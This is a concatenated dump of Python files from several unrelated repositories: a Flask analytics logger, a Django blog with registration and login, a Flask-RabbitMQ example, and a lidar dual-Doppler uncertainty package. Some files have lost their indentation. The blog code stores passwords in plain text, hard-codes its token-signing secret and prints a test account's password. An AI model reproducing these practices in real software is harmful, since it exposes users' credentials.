        """Insert this row and commit (also called as LogTable.save_to_db(row))."""
        db.session.add(self)
        db.session.commit()
| {"/view/views.py": ["/view/_app.py", "/view/models.py"], "/view/models.py": ["/view/_app.py"], "/view/_app.py": ["/view/models.py"]} |
50,020 | melqueawq/analytics | refs/heads/master | /view/_app.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
import logging
import json
import datetime
import urllib
import os
app = Flask(__name__, template_folder='../templates',
static_folder="../static")
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get(
'DATABASE_URL') or "sqlite:///data.db"
app.config['SQLALCHEMY_TRUCK_MODIFICATIONS'] = True
db = SQLAlchemy(app)
Migrate(app, db)
loggers = {}
# 設定ファイル読み込み
with open('config.json', 'r') as f:
config = json.load(f)
@app.before_first_request
def create_tables():
from .models import LogTable
db.create_all()
def getLogger(name=__name__, filename=None):
    """Return a cached logger; on first use create it at DEBUG level with
    an appending file handler (when *filename* is given) or a stream
    handler.
    """
    global loggers
    cached = loggers.get(name)
    if cached:
        return cached
    logger = logging.getLogger(name)
    logger.setLevel(logging.DEBUG)
    handler = logging.FileHandler(filename, 'a') if filename else logging.StreamHandler()
    logger.addHandler(handler)
    loggers[name] = logger
    return logger
def conversion(request):
# コンバージョンをログに保存
now = datetime.datetime.now()
ip = request.remote_addr
conv = request.args.get('param')
url = urllib.parse.unquote(request.url)
logger = getLogger('conv', 'conv.log')
logger.info('{0:%Y/%m/%d %H:%M:%S} - '.format(now) +
ip + ' - ' + conv + ' - ' + url)
def campaign(adid, request):
# 広告流入をログに保存
now = datetime.datetime.now()
url = request.args.get('url')
ref = request.args.get('ref')
conv = request.args.get('param')
# 媒体が定義されていれば処理
for v in config['campaign']:
if v['ad'] == adid and v['cv'] == conv:
logger = getLogger('campaign', 'campaign.log')
logger.info('{0:%Y/%m/%d %H:%M:%S} - '.format(now) +
str(v['id']) + ' - ' + v['ad'] + ' - ' +
url + ' ' + ref)
def uid_entry(cid, uid):
    """Record *uid* under *cid* in member.json, creating the file and the
    cid entry as needed; nothing is rewritten when the uid is already known.
    """
    # Load existing membership data; start fresh if the file is missing or
    # (robustness fix) contains invalid JSON from an interrupted write.
    try:
        with open('member.json', 'r') as f:
            j = json.load(f)
    except (FileNotFoundError, json.JSONDecodeError):
        j = {}
    # Register the cid on first sight.
    if cid not in j:
        j[cid] = []
    # Persist only when this uid is new for the cid.
    if uid not in j[cid]:
        j[cid].append(uid)
        with open('member.json', 'w') as f:
            json.dump(j, f, indent=2)
| {"/view/views.py": ["/view/_app.py", "/view/models.py"], "/view/models.py": ["/view/_app.py"], "/view/_app.py": ["/view/models.py"]} |
50,024 | keephunger/django_blog | refs/heads/master | /blog/migrations/0001_initial.py | # Generated by Django 2.2.10 on 2020-02-28 18:36
from django.db import migrations, models
import django.db.models.deletion
import extra_apps.DjangoUeditor.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Article',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200, verbose_name='博客标题')),
('date_time', models.DateTimeField(auto_now_add=True, verbose_name='日期')),
('content', extra_apps.DjangoUeditor.models.UEditorField(blank=True, null=True, verbose_name='内容')),
('view', models.BigIntegerField(default=0, verbose_name='阅读数')),
('comment_value', models.BigIntegerField(default=0, verbose_name='评论数')),
],
options={
'verbose_name': '文章',
'verbose_name_plural': '文章',
'ordering': ['-date_time'],
},
),
migrations.CreateModel(
name='BlogUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=20, verbose_name='名字')),
('password', models.CharField(max_length=45, verbose_name='密码')),
('email', models.CharField(max_length=45, verbose_name='邮箱')),
('active_flag', models.IntegerField(default=0, verbose_name='激活标志')),
],
options={
'verbose_name': '用户',
'verbose_name_plural': '用户',
'db_table': 'blog_user',
},
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.CharField(max_length=200, verbose_name='评论内容')),
('user', models.CharField(max_length=200, verbose_name='发布者')),
('date_time', models.DateTimeField(auto_now_add=True, verbose_name='日期')),
('article', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Article', verbose_name='文章')),
],
options={
'verbose_name': '评论',
'verbose_name_plural': '评论',
},
),
migrations.AddField(
model_name='article',
name='author',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.BlogUser', verbose_name='作者'),
),
]
| {"/blog/views.py": ["/blog/models.py"], "/blog/admin.py": ["/blog/models.py"]} |
50,025 | keephunger/django_blog | refs/heads/master | /blog/templatetags/extra_tags.py | # my_filter.py
from django import template
register = template.Library()
@register.filter
def link_str(value):
    """Return the text of the first <p>...</p> fragment in *value*.

    BUG FIX: the original used str.strip('p>'), which strips the character
    set {'p', '>'} from BOTH ends of the string — e.g. "<p>python</p>"
    became "ython" and "<p>stop</p>" became "sto". Only the leading "p>"
    tag remainder should be removed.
    """
    # Text between the first '<' and the next '<'; e.g.
    # "<p>hello</p>" -> "p>hello".
    segment = str(value).split('<')[1]
    if segment.startswith('p>'):
        segment = segment[2:]
    return segment
50,026 | keephunger/django_blog | refs/heads/master | /blog/models.py | from django.db import models
# Create your models here.
from extra_apps.DjangoUeditor.models import UEditorField
class BlogUser(models.Model):
    """Site account: credentials plus an e-mail activation flag."""

    username = models.CharField(verbose_name='名字', max_length=20)
    # NOTE(review): passwords are stored in plain text — consider hashing.
    password = models.CharField(verbose_name='密码', max_length=45)
    email = models.CharField(verbose_name='邮箱', max_length=45)
    # 0 = awaiting e-mail confirmation, 1 = activated.
    active_flag = models.IntegerField(verbose_name='激活标志', default=0)

    class Meta:
        db_table = 'blog_user'
        verbose_name = '用户'
        verbose_name_plural = '用户'

    def __str__(self):
        return self.username
class Article(models.Model):
    """A blog post with denormalised view and comment counters."""

    title = models.CharField(verbose_name='博客标题', max_length=200)
    date_time = models.DateTimeField(verbose_name='日期', auto_now_add=True)
    # Rich-text body edited through UEditor; uploads go under images/ and files/.
    content = UEditorField(verbose_name='内容', width=600, height=300,
                           toolbars="full", imagePath="images/",
                           filePath="files/",
                           upload_settings={"imageMaxSize": 1204000},
                           settings={}, blank=True, null=True)
    author = models.ForeignKey('BlogUser', verbose_name='作者',
                               on_delete=models.CASCADE)
    view = models.BigIntegerField(verbose_name='阅读数', default=0)
    comment_value = models.BigIntegerField(verbose_name='评论数', default=0)

    class Meta:
        verbose_name = "文章"
        verbose_name_plural = "文章"
        ordering = ['-date_time']  # newest first

    def __str__(self):
        return self.title

    def viewed(self):
        """Bump the read counter by one and persist only that column."""
        self.view += 1
        self.save(update_fields=['view'])

    def commenced(self):
        """Bump the comment counter by one and persist only that column."""
        self.comment_value += 1
        self.save(update_fields=['comment_value'])
class Comment(models.Model):
    """A reader comment attached to a single article."""

    content = models.CharField(verbose_name='评论内容', max_length=200)
    user = models.CharField(verbose_name='发布者', max_length=200)
    date_time = models.DateTimeField(verbose_name='日期', auto_now_add=True)
    article = models.ForeignKey('Article', verbose_name='文章',
                                on_delete=models.CASCADE)

    class Meta:
        verbose_name = "评论"
        verbose_name_plural = "评论"
        ordering = ['-date_time']  # newest first
| {"/blog/views.py": ["/blog/models.py"], "/blog/admin.py": ["/blog/models.py"]} |
50,027 | keephunger/django_blog | refs/heads/master | /blog/views.py | import jsonpickle as jsonpickle
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.http import HttpResponse, JsonResponse, HttpResponseRedirect
from django.shortcuts import render
# Create your views here.
from django.urls import reverse
from django.views import View
from itsdangerous import TimedJSONWebSignatureSerializer
from blog.forms import ArticleModelForm
from blog.models import BlogUser, Article, Comment
# 检查是否登录的装饰器
def login_detection(fun1):
    """Decorator for views that must only be reachable while logged *out*.

    If the session already holds a user, the request is redirected to the
    blog index instead of running the wrapped view; otherwise ``fun1`` runs
    unchanged.  The first positional argument is assumed to be the request
    object (true for both plain views and the static methods of the
    class-based views in this module).
    """
    from functools import wraps  # local import: keeps module imports untouched

    @wraps(fun1)  # preserve the wrapped view's name/docstring for debugging
    def fun2(*args, **kwargs):
        user = args[0].session.get('user', 0)
        if user:  # a non-empty session entry means "already logged in"
            return HttpResponseRedirect(reverse('blog:blog_index'))
        return fun1(*args, **kwargs)
    return fun2
def blog_index(request):
    """Render the home page with the paginated article list.

    When a serialized user is present in the session it is decoded and
    exposed to the template as ``theuser``.
    """
    context = pagenator_articles(request)  # article page + page-number window
    serialized_user = request.session.get('user', 0)
    if serialized_user:
        context['theuser'] = jsonpickle.decode(serialized_user)
    return render(request, 'index.html', context)
class BlogLogin(View):
    """Login endpoint: GET shows the form, POST checks credentials."""

    @staticmethod
    @login_detection
    def get(request):
        # Only reachable while logged out (see login_detection).
        return render(request, 'login.html')

    @staticmethod
    def post(request):
        candidate = BlogUser.objects.filter(
            username=request.POST.get('username')).first()
        password = request.POST.get('pwd')
        # NOTE(review): passwords are compared in plain text.
        authenticated = (candidate is not None
                         and candidate.password == password
                         and candidate.active_flag == 1)
        if not authenticated:
            return JsonResponse({'flag': -1})
        request.session['user'] = jsonpickle.encode(candidate)
        return JsonResponse({'flag': 0})
class Register(View):
    """Sign-up endpoint.

    GET renders the registration form (only when logged out).  POST creates
    an inactive account — unless the username is already taken by an
    activated account — and e-mails a time-limited activation link.
    """
    @staticmethod
    @login_detection
    def get(request):
        return render(request, 'register.html')
    @staticmethod
    def post(request):
        from django.core.mail import send_mail
        # Read the requested username and look for an existing account.
        username = request.POST.get('username')
        user = BlogUser.objects.filter(username=username)
        # Build a signed activation token valid for one hour.
        # NOTE(review): the signing secret is hard-coded here and in
        # activate(); it should live in settings.
        t = TimedJSONWebSignatureSerializer('hello你爱你', expires_in=3600)
        res = t.dumps({'user_name': username})
        res = res.decode()
        # Remaining form fields.
        pwd = request.POST.get('pwd')
        email = request.POST.get('email')
        # Create the account only when the username is free.
        # NOTE(review): the password is stored in plain text.
        if len(user) == 0:
            BlogUser.objects.create(username=username, password=pwd, email=email)
        # Username taken by an already-activated account: reject.
        # (For an existing *inactive* account the activation mail is simply
        # re-sent; the submitted password/e-mail are ignored in that case.)
        elif user.first().active_flag == 1:
            return JsonResponse({'flag': -1})
        send_mail(
            subject='欢迎注册',
            message="",
            from_email='254414795@qq.com',
            recipient_list=[email],
            fail_silently=False,
            html_message='<a href="https://stormy-brushlands-24614.herokuapp.com/activate/?token={}">点击注册</a>'.format(
                res)
        )
        return HttpResponse('请前往邮箱验证')
def activate(request):
    """Activate an account from the e-mailed token, then go to the index."""
    token = request.GET.get('token')
    # Same secret/lifetime as Register.post; loads() raises if the token is
    # expired or tampered with.
    serializer = TimedJSONWebSignatureSerializer('hello你爱你', expires_in=3600)
    payload = serializer.loads(token)
    matches = BlogUser.objects.filter(username=payload['user_name'])
    if len(matches) == 1:
        account = matches[0]
        account.active_flag = 1
        account.save()
        return HttpResponseRedirect(reverse('blog:blog_index'))
    return HttpResponse('注册失败')
def logout(request):
    """Drop the session's user entry (if any) and render the home page."""
    stored = request.session.get('user', '')
    if stored:
        del request.session['user']
    return render(request, 'index.html')
def show_article(request):
    """Display a single article together with its paginated comments.

    Returns ``HttpResponse(0)`` when the id is missing or unknown; otherwise
    increments the article's view counter and renders the detail template.
    """
    article_id = request.GET.get('id', '')
    if not article_id:
        return HttpResponse(0)  # missing id
    article = Article.objects.filter(id=article_id).first()
    if not article:
        return HttpResponse(0)  # unknown id
    article.viewed()  # count this visit
    context = pagenator_comments(request, article)
    context["article"] = article
    serialized_user = request.session.get('user', 0)
    if serialized_user:
        context["theuser"] = jsonpickle.decode(serialized_user)
    return render(request, 'article.html', context)
class Publish(View):
    """Article authoring: GET shows the editor, POST saves the article."""

    @staticmethod
    def get(request):
        serialized_user = request.session.get('user', 0)
        if not serialized_user:
            return render(request, 'login.html')  # must log in first
        context = {
            'theuser': jsonpickle.decode(serialized_user),
            'form': ArticleModelForm,  # form class; template instantiates it
        }
        return render(request, 'publish_art.html', context)

    @staticmethod
    def post(request):
        form = ArticleModelForm(request.POST)
        author = jsonpickle.decode(request.session.get('user', ''))
        if not form.is_valid():
            return HttpResponse('faile')  # (sic) original error marker
        form.instance.author = author  # attach the logged-in user as author
        form.save()
        return HttpResponseRedirect(
            reverse('blog:show_article') + f'?id={form.instance.id}')
def comment(request):
    """Store a comment for an article and bounce back to its detail page.

    Requires a logged-in session user, an article id in the query string and
    non-empty comment text in the POST body; otherwise returns a login
    prompt or ``HttpResponse(0)``.
    """
    article_id = request.GET.get('id', '')
    serialized_user = request.session.get('user', '')
    if not serialized_user:
        return HttpResponse("请登录,测试用户:18832059218,密码123456")
    author = jsonpickle.decode(serialized_user)
    # Renamed from ``comment``: the local previously shadowed this function.
    text = request.POST.get('comment', '')
    if article_id and author and text:
        article = Article.objects.get(id=article_id)
        # Fix: Comment.objects.create() already persists the row; the
        # original chained an extra .save(), issuing a redundant second
        # database write.
        Comment.objects.create(user=author.username, content=text,
                               article=article)
        article.commenced()  # keep the denormalised comment counter in sync
        return HttpResponseRedirect(reverse('blog:show_article') + f'?id={article_id}')
    else:
        return HttpResponse(0)
def pagenator_articles(request):
"""
文章分页器
:param request:
:return:
"""
num = request.GET.get('num', '1')
if num.isdigit():#防止非数字
num = int(num)
else:
num=1
articles = Article.objects.all()
paginator = Paginator(articles, 2)
try:
article_per_page = paginator.page(num) # 获取当前页码的记录
except PageNotAnInteger: # 如果用户输入的页码不是整数时,显示第1页的内容
article_per_page = paginator.page(1)
except EmptyPage: # 如果用户输入的页数不在系统的页码列表中时,显示最后一页的内容
article_per_page = paginator.page(paginator.num_pages)
# 每页开始页码
begin = (num - 5)
if begin < 1:
begin = 1
# 每页结束页码
end = begin + 9
if end > paginator.num_pages:
end = paginator.num_pages
if end <= 10:
begin = 1
else:
begin = end - 9
pagelist = range(begin, end + 1)
context = {'article_per_page': article_per_page, 'pagelist': pagelist}
return context
def pagenator_comments(request, article):
"""
评论分页器
:param request:
:return:
"""
num = request.GET.get('num', '1')
if num.isdigit():#防止非数字
num = int(num)
else:
num=1
comments = Comment.objects.filter(article=article)
paginator = Paginator(comments, 2)
try:
comment_per_page = paginator.page(num) # 获取当前页码的记录
except PageNotAnInteger: # 如果用户输入的页码不是整数时,显示第1页的内容
comment_per_page = paginator.page(1)
except EmptyPage: # 如果用户输入的页数不在系统的页码列表中时,显示最后一页的内容
comment_per_page = paginator.page(paginator.num_pages)
# 每页开始页码
begin = (num - 5)
if begin < 1:
begin = 1
# 每页结束页码
end = begin + 9
if end > paginator.num_pages:
end = paginator.num_pages
if end <= 10:
begin = 1
else:
begin = end - 9
pagelist = range(begin, end + 1)
context = {'comment_per_page': comment_per_page, 'pagelist': pagelist}
return context
| {"/blog/views.py": ["/blog/models.py"], "/blog/admin.py": ["/blog/models.py"]} |
50,028 | keephunger/django_blog | refs/heads/master | /blog/admin.py | from django.contrib import admin
# Register your models here.
from blog.models import Article, BlogUser
# Make the blog models manageable through Django's admin site.
admin.site.register(Article)
admin.site.register(BlogUser)
| {"/blog/views.py": ["/blog/models.py"], "/blog/admin.py": ["/blog/models.py"]} |
50,029 | keephunger/django_blog | refs/heads/master | /blog/urls.py |
from django.contrib import admin
from django.urls import path
from blog import views
# URL namespace used by reverse(), e.g. reverse('blog:blog_index').
app_name="blog"
urlpatterns = [
    path(r'',views.blog_index,name="blog_index"),  # home page
    path(r'login/',views.BlogLogin.as_view(),name="blog_login"),# log in
    path(r'register/',views.Register.as_view(),name="blog_register"),# sign up
    path(r'logout/', views.logout, name="blog_logout"),# log out
    path(r'activate/',views.activate),# e-mail account activation
    path(r'publish/',views.Publish.as_view(),name='publish'),# publish an article
    path(r'article/', views.show_article,name='show_article'),# view an article
    path(r'comment/', views.comment, name='blog_comment'),  # post a comment
]
| {"/blog/views.py": ["/blog/models.py"], "/blog/admin.py": ["/blog/models.py"]} |
50,042 | pushy-site/flask-rabbitmq | refs/heads/master | /example/app/test/default.py | # encoding:utf-8
from example.app import rpc
class DefaultExchange(object):
    """Consumer bound to RabbitMQ's default exchange via the shared rpc object."""

    def __init__(self):
        # No per-instance state; kept for explicitness.
        pass

    def callback(self, ch, method, props, body):
        # Print every message body delivered from the queue.
        print(body)

    def declare(self):
        # Subscribe self.callback to the 'hello' queue on the default exchange.
        rpc.declare_default_consuming('hello', self.callback)
50,043 | pushy-site/flask-rabbitmq | refs/heads/master | /example/app/__init__.py | #encoding:utf-8
from flask import Flask
from example import config
from flask_rabbitmq import RabbitMQ
from flask_rabbitmq import Queue
app = Flask(__name__)
app.config.from_object(config)  # load settings from example/config.py
queue = Queue()  # collects consumer registrations before the app starts
rpc = RabbitMQ(app, queue)  # shared RabbitMQ client used by the handlers
# Imported for its side effect: registers the consumers in example.app.test.
from example.app import test
| {"/example/app/test/default.py": ["/example/app/__init__.py"]} |
50,047 | andh-dtu/YADDUM | refs/heads/master | /yaddum/__init__.py | from .yaddum import Uncertainty
| {"/yaddum/__init__.py": ["/yaddum/yaddum.py"], "/test/test.py": ["/yaddum/__init__.py"]} |
50,048 | andh-dtu/YADDUM | refs/heads/master | /test/test.py | import yaddum as yaddum
import numpy as np
import matplotlib.pyplot as plt
import xarray as xr
# Build the assessment object and describe the flow with a power-law profile.
lidar_uncertainty = yaddum.Uncertainty()
model_pars={'wind_speed':10,
            'upward_air_velocity':0,
            'wind_from_direction':0,
            'reference_height':100,
            'shear_exponent':0.2}
lidar_uncertainty.add_atmosphere('pl_1', 'power_law', model_pars)
# Measurement geometry 1: a 10 m resolution horizontal mesh, 5 km half-extent,
# centred at the origin, 100 m above ground and sea level.
lidar_uncertainty.add_measurements('mesh', 'horizontal_mesh',
                                   resolution = 10,
                                   mesh_center = np.array([0,0,100,100]),
                                   extent = 5000)
# Measurement geometry 2: two individual points [x, y, H_asl, H_agl].
points = np.array([[500,-500,100,100], [1000,2,300,300]])
lidar_uncertainty.add_measurements('pts', 'points', positions = points)
# Intrinsic instrument uncertainties shared by both lidars.
uncertainty_pars = {'u_estimation':0.1,
                    'u_azimuth':0.1,
                    'u_elevation':0.1,
                    'u_range':1}
lidar_pos_1 = np.array([0,0,0])
lidar_pos_2 = np.array([1000,1000,0])
lidar_uncertainty.add_lidar('koshava', lidar_pos_1, **uncertainty_pars)
lidar_uncertainty.add_lidar('whittle', lidar_pos_2, **uncertainty_pars)
# Dual-Doppler uncertainty over the mesh, then plot one lidar's azimuth gain.
lidar_uncertainty.calculate_uncertainty(['koshava', 'whittle'], 'mesh', 'pl_1',
                                        uncertainty_model='dual-Doppler')
lidar_uncertainty.uncertainty.azimuth_gain.sel(instrument_id = 'koshava').plot()
plt.show()
50,049 | andh-dtu/YADDUM | refs/heads/master | /setup.py | # Always prefer setuptools over distutils
from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
# Use the README as the PyPI long description.
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
    long_description = f.read()
# Arguments marked as "Required" below must be included for upload to PyPI.
# Fields marked as "Optional" may be commented out.
setup(
    name='yaddum',  # Required
    version='0.2.0',  # Required
    description='Yet Another Dual-Doppler Uncertainty Model (YADDUM): Python libpackage for dual-Doppler uncertainty assessment',  # Optional
    long_description=long_description,
    long_description_content_type='text/markdown',
    url='https://github.com/niva83/YADDUM',  # Optional
    author='Nikola Vasiljevic',  # Optional
    author_email='niva@dtu.dk',  # Optional
    classifiers=[  # Optional
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Build Tools',
        'License :: OSI Approved :: BSD License',
        'Programming Language :: Python :: 3.7',
    ],
    packages=['yaddum'],  # Required
    python_requires='>=3.7.3',
    # Runtime dependencies installed alongside the package.
    install_requires=[
        'xarray',
        'netCDF4',
        'matplotlib',
        'jupyter',
        'pylint'
    ]
)
| {"/yaddum/__init__.py": ["/yaddum/yaddum.py"], "/test/test.py": ["/yaddum/__init__.py"]} |
50,050 | andh-dtu/YADDUM | refs/heads/master | /yaddum/yaddum.py | """This is a Python package for dual-Doppler uncertainty assessment.
It includes several class which are used to perform the assessment.
"""
from math import cos, sin, pi, radians
import numpy as np
import xarray as xr
def wind_vector_to_los(u,v,w, azimuth, elevation, ignore_elevation = True):
    """Project a wind vector onto a beam's line of sight (LOS).

    Parameters
    ----------
    u, v, w : ndarray
        Wind components (eastward_wind, northward_wind, upward_air_velocity
        in cf convention), in m/s.
    azimuth, elevation : ndarray
        Beam pointing angles in degrees.
    ignore_elevation : bool, optional
        When True (default) the elevation angle is ignored and only the
        horizontal projection is returned.

    Returns
    -------
    los : ndarray
        Radial (LOS) wind speed in m/s, positive when the wind approaches
        the instrument (cf: radial_velocity_of_scatterers_toward_instrument).

    Notes
    -----
    The full projection is
    ``V_radial = u*sin(az)*cos(el) + v*cos(az)*cos(el) + w*sin(el)``
    with ``az`` and ``el`` the beam azimuth and elevation angles.
    """
    # np.radians handles scalars and arrays alike.
    az_rad = np.radians(azimuth)
    el_rad = np.radians(elevation)
    if ignore_elevation:
        los = u * np.sin(az_rad) + v * np.cos(az_rad)
    else:
        los = u * np.sin(az_rad) * np.cos(el_rad) \
              + v * np.cos(az_rad) * np.cos(el_rad) \
              + w * np.sin(el_rad)
    return los
def generate_mesh(center, map_extent, mesh_res):
    """Create a square horizontal mesh of equally spaced points.

    Parameters
    ----------
    center : ndarray
        1D array [x, y, Height asl, Height agl] of the mesh centre, in m.
    map_extent : int
        Half-width of the mesh in both horizontal directions, in m.
    mesh_res : int
        Grid spacing in both horizontal directions, in m.

    Returns
    -------
    x, y : ndarray
        2D coordinate grids of the mesh points.
    mesh : ndarray
        Flat (n, 4) array of points [x, y, H_asl, H_agl].

    Notes
    -----
    The mesh is square, i.e. it has the same length in both dimensions.
    """
    extent = int(map_extent)
    step = int(mesh_res)
    lower_left = center[:2] - extent
    upper_right = center[:2] + extent
    x, y = np.meshgrid(
        np.arange(lower_left[0], upper_right[0] + step, step),
        np.arange(lower_left[1], upper_right[1] + step, step)
    )
    # Heights are constant across the horizontal mesh.
    h_asl = np.full(x.shape, center[2])
    h_agl = np.full(x.shape, center[3])
    mesh = np.array([x, y, h_asl, h_agl]).T.reshape(-1, 4)
    return x, y, mesh
def generate_beam_coords(lidar_pos, meas_pt_pos):
    """Compute beam steering coordinates in a spherical coordinate system.

    Parameters
    ----------
    lidar_pos : ndarray
        1D array [x, y, z] with the lidar position, in m.
    meas_pt_pos : ndarray
        A single point [x, y, z] or an (n, >=3) array of points, in m.

    Returns
    -------
    beam_coord : ndarray
        (n, 3) array of [azimuth, elevation, range] per point; angles in
        degrees (meteorological convention), range in m.
    """
    # Normalise input to per-axis coordinate arrays for single/multi point.
    if len(meas_pt_pos.shape) == 2:
        xs, ys, zs = meas_pt_pos[:, 0], meas_pt_pos[:, 1], meas_pt_pos[:, 2]
    else:
        xs = np.array([meas_pt_pos[0]])
        ys = np.array([meas_pt_pos[1]])
        zs = np.array([meas_pt_pos[2]])
    dx = lidar_pos[0] - xs
    dy = lidar_pos[1] - ys
    dz = lidar_pos[2] - zs
    # Slant range and its projection onto the horizontal plane.
    distance_3d = (dx**2 + dy**2 + dz**2)**(1./2)
    distance_2d = (dx**2 + dy**2)**(1./2)
    # Azimuth in meteorological convention (0 deg = North, clockwise).
    azimuth = np.arctan2(xs - lidar_pos[0], ys - lidar_pos[1])
    azimuth = (360 + azimuth * (180 / pi)) % 360
    # Elevation, signed by whether the point lies above or below the lidar.
    elevation = np.arccos(distance_2d / distance_3d)
    elevation = np.sign(zs - lidar_pos[2]) * (elevation * (180 / pi))
    return np.transpose(np.array([azimuth, elevation, distance_3d]))
class Atmosphere:
    """Container for atmospheric-model descriptions.

    Attributes
    ----------
    atmosphere : dict
        Maps atmosphere_id -> {'model', 'model_parameters'}.
    wind_field : xarray.Dataset or None
        Populated by subclasses once the wind is evaluated.
    verbos : bool
        When True, add_atmosphere prints a confirmation message.
    """
    def __init__(self):
        self.atmosphere = {}
        self.wind_field = None
        self.verbos = True

    def add_atmosphere(self, atmosphere_id, model, model_parameters):
        """Add a description of the atmosphere to the atmosphere dictionary.

        This description is later used to calculate the lidar uncertainty.

        Parameters
        ----------
        atmosphere_id : str
            Key identifying this atmosphere instance in the dictionary.
        model : str
            Atmospheric model name; currently only 'power_law' is supported.
        model_parameters : dict
            Must contain 'wind_speed' (non-zero), 'wind_from_direction',
            'shear_exponent' (non-zero) and 'reference_height' (>= 0);
            'upward_air_velocity' is optional and defaults to 0.

        Raises
        ------
        ValueError
            If the selected model is not supported by the package.

        Notes
        -----
        On success the entry is extended with the Cartesian components
        'eastward_wind', 'northward_wind' and 'upward_air_velocity' derived
        from speed and direction.

        TODO
        ----
        - Support other atmospheric models (e.g., log wind profile)
        """
        if model != 'power_law':
            raise ValueError("UnsupportedModel")

        # Bug fix: the original used identity checks ("is not 0") which emit
        # SyntaxWarning on modern CPython and wrongly accepted 0.0, because a
        # float zero is a different object from the int literal 0.
        parameters_ok = (
            model_parameters.get('wind_speed') is not None
            and model_parameters.get('wind_speed') != 0
            and 'wind_from_direction' in model_parameters
            and model_parameters['wind_from_direction'] is not None
            and model_parameters.get('shear_exponent') is not None
            and model_parameters.get('shear_exponent') != 0
            and model_parameters.get('reference_height') is not None
            and model_parameters['reference_height'] >= 0
        )
        if parameters_ok:
            wind_speed = model_parameters["wind_speed"]
            wind_from_direction = model_parameters["wind_from_direction"]
            # Meteorological convention: direction is where the wind comes FROM.
            u = - wind_speed * sin(radians(wind_from_direction))
            v = - wind_speed * cos(radians(wind_from_direction))
            w = model_parameters.get('upward_air_velocity', 0)
            model_parameters.update({
                'eastward_wind' : u,
                'northward_wind' : v,
                'upward_air_velocity' : w
            })
            dict_input = {atmosphere_id: {
                "model" : model,
                "model_parameters": model_parameters}}
            self.atmosphere.update(dict_input)
            if self.verbos:
                print('Atmosphere \'' + atmosphere_id
                      + '\' added to the atmosphere dictionary,'
                      + ' which now contains '
                      + str(len(self.atmosphere))
                      + ' atmosphere instance(s).')
        else:
            print('Incorrect parameters for power law model!')
class Measurements(Atmosphere):
    """A class containing methods and attributes related to measurements.

    Methods
    -------
    add_measurements(measurements_id, category, utm_zone, **kwargs)
        Adds measurement positions to the measurements dictionary.
    calculate_wind(measurements_id, atmosphere_id)
        Evaluates the wind at the measurement points and stores the result
        in self.wind_field (an xarray Dataset).
    """
    def __init__(self):
        # measurements maps measurements_id -> {'category', 'positions', ...}
        self.measurements = {}
        Atmosphere.__init__(self)
    @staticmethod
    def check_measurement_positions(measurement_positions):
        """
        Validates the measurement positions.

        Parameters
        ----------
        measurement_positions : ndarray
            (n, 4) array with Easting, Northing, Height asl and Height agl
            coordinates of the measurement points, in meters.

        Returns
        -------
        True / False

        See also
        --------
        add_measurements() : adds measurements to the measurement dictionary
        """
        if(type(measurement_positions).__module__ == np.__name__):
            if (len(measurement_positions.shape) == 2
                and measurement_positions.shape[1] == 4): # 4 columns: height asl and agl both required
                return True
            else:
                # wrong shape: must be (n, 4)
                return False
        else:
            # not a numpy array
            return False
    def add_measurements(self, measurements_id, category='points',
                         utm_zone = '', **kwargs):
        """
        Adds desired measurement positions to the measurements dictionary.

        The measurement points are used for the uncertainty calculation.

        Parameters
        ----------
        measurements_id : str, required
            String which identifies measurements instance in the dictionary.
        category : str, required
            Either 'points' or 'horizontal_mesh'. Default 'points'.
        utm_zone : str, optional
            UTM zone in which points are located.
            NOTE(review): currently accepted but never stored or used.

        Other Parameters
        -----------------
        positions : ndarray
            (n, 4) array [Easting, Northing, H asl, H agl] in meters.
            Required if category=='points'.
        mesh_center : ndarray
            [Easting, Northing, H asl, H agl] of the mesh center, in meters.
            Required if category=='horizontal_mesh'.
        extent : int
            Mesh extent in Northing and Easting in meters.
            Required if category=='horizontal_mesh'.
        resolution : int
            Mesh resolution in meters.
            Required if category=='horizontal_mesh'.

        Raises
        ------
        ValueError
            "UnsupportedCategory", "PositionsMissing",
            "InappropriatePositions" or "MissingKwargs" depending on which
            validation fails.

        TODO
        ----
        - Accept other categories such as LOS, PPI, RHI, VAD and DBS
        """
        if category not in {'points', 'horizontal_mesh'}:
            raise ValueError("UnsupportedCategory")
        if category == 'points' and 'positions' not in kwargs:
            raise ValueError("PositionsMissing")
        if (category == 'points' and
            'positions' in kwargs and
            not(self.check_measurement_positions(kwargs['positions']))):
            raise ValueError("InappropriatePositions")
        if category == 'horizontal_mesh' and set(kwargs) != {'resolution','mesh_center', 'extent'}:
            raise ValueError("MissingKwargs")
        if category == 'points':
            measurements_dict = {measurements_id :
                                     {'category': category,
                                      'positions' : kwargs['positions']
                                     }
                                }
            self.measurements.update(measurements_dict)
        elif category == 'horizontal_mesh':
            # Build the mesh once; nrows/ncols are kept so the flat point
            # list can later be reshaped back into a grid.
            x, y, mesh_points = generate_mesh(kwargs['mesh_center'],
                                              kwargs['extent'],
                                              kwargs['resolution'])
            nrows, ncols = x.shape
            measurements_dict = {measurements_id :
                                     {'category': category,
                                      'nrows' : nrows,
                                      'ncols' : ncols,
                                      'positions' : mesh_points
                                     }
                                }
            self.measurements.update(measurements_dict)
        if self.verbos:
            print('Measurements \'' + measurements_id
                  + '\' added to the measurement dictionary,'
                  + ' which now contains '
                  + str(len(self.measurements))
                  + ' measurement instance(s).')
    def __create_wind_ds(self, atmosphere, measurements,
                         u, v, w, wind_speed, wind_from_direction):
        """
        Creates the wind field xarray Dataset (self.wind_field).

        Parameters
        ----------
        atmosphere : dict
            Dictionary entry describing the atmosphere (model + parameters).
        measurements : dict
            Dictionary entry describing the measurements.
        u, v, w : ndarray
